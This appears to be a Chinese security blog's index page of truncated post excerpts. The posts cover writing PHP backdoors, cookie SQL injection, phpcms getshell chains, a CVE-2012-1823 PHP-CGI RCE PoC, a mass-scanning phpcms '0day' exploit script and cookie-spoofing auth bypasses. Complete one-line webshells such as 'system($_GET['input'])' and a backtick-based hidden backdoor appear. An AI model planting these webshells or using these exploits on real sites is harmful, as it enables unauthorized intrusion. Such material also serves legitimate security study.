关于php后门的编写

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写   system() <?php system($_GET['input']); ?> http://192.168.247.133:81/shell.php?input=dir &nbs...

- 阅读全文 -

PHP+MYSQL环境下的Cookies爆错注入实战

PHP+MYSQL环境下的Cookies爆错注入实战,混世魔王。 技巧源于技术,所以你在浏览混世魔王的技术博客的时候,会发现技术形式的文章居多,而且都还算详细,而技巧形式的文章,绝大多数是装逼标题党,内容都点到为止。技术形式的文章,你能看懂并发现问题,大家可以针对某个技术问题深入探讨研究,提升你我的技术,还可能会交到志同道合的朋友,而技巧形式的属于比较急功近利,用的人多了,结果只会被人滥用到死。 ...

- 阅读全文 -

phpcms 2008多个漏洞 (可getshell)

一个漏洞不可怕,可怕的是一连串的漏洞,拼接起来就可以getshell了。 ###文件包含 <?php define('IN_YP', TRUE); define('ADMIN_ROOT', str_replace("", '/',dirname(__FILE__)).'/'); require '../include/common.inc.php'; ## 要登陆 if(!$_userid)...

- 阅读全文 -

CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RCE的PoC原文没...

- 阅读全文 -

win2008下如何快速安装PHP,并做好安全设置

虽然现在跑PHP的最佳选择还是Linux,但是随着Windows Server 2008 的出现,前者和后者的差距已经大大缩小,对于不懂Linux操作的朋友,可以丢弃Windows 2003 Server了,选择更好的Windows Server 2008。   在Windows Server 2008下配置PHP环境特别的快,只需要鼠标点点就可以了。   1,下载PHP5.2...

- 阅读全文 -

phpcms-exp 0day

<?php error_reporting(E_ERROR); set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastp...

- 阅读全文 -

搜一次 cms php 通杀

洞文件 admin 目录下的 admin_loginstate.php 看代码 if(empty($_COOKIE['S_AdminID'])){ echo "<script>window.location='admin_login.php'</script>"; exit; } elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_Adm...

- 阅读全文 -

一个官方没有公布的php秘籍,可用作后门

发现这个也是巧合,我就直接说了吧 <?php //t.php $test = $_GET['r']; echo `$test`; ?> 大家看看这个代码有木有问题? 这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 信息安全团队 而且又不是单引号,这个就是关键所...

- 阅读全文 -

php 源码审计之 cookies 欺骗

ebycms是一套手机音乐cms系统 直接上代码 admin目录下的in.php <?php require_once('L:/wamp/www//fern.php'); Annotation("L:\wamp\www\eby\admin\in.php_0"); define(EBY_IN,TRUE); define('ADMIN_ROOT', str_replace("\","/",dir...

- 阅读全文 -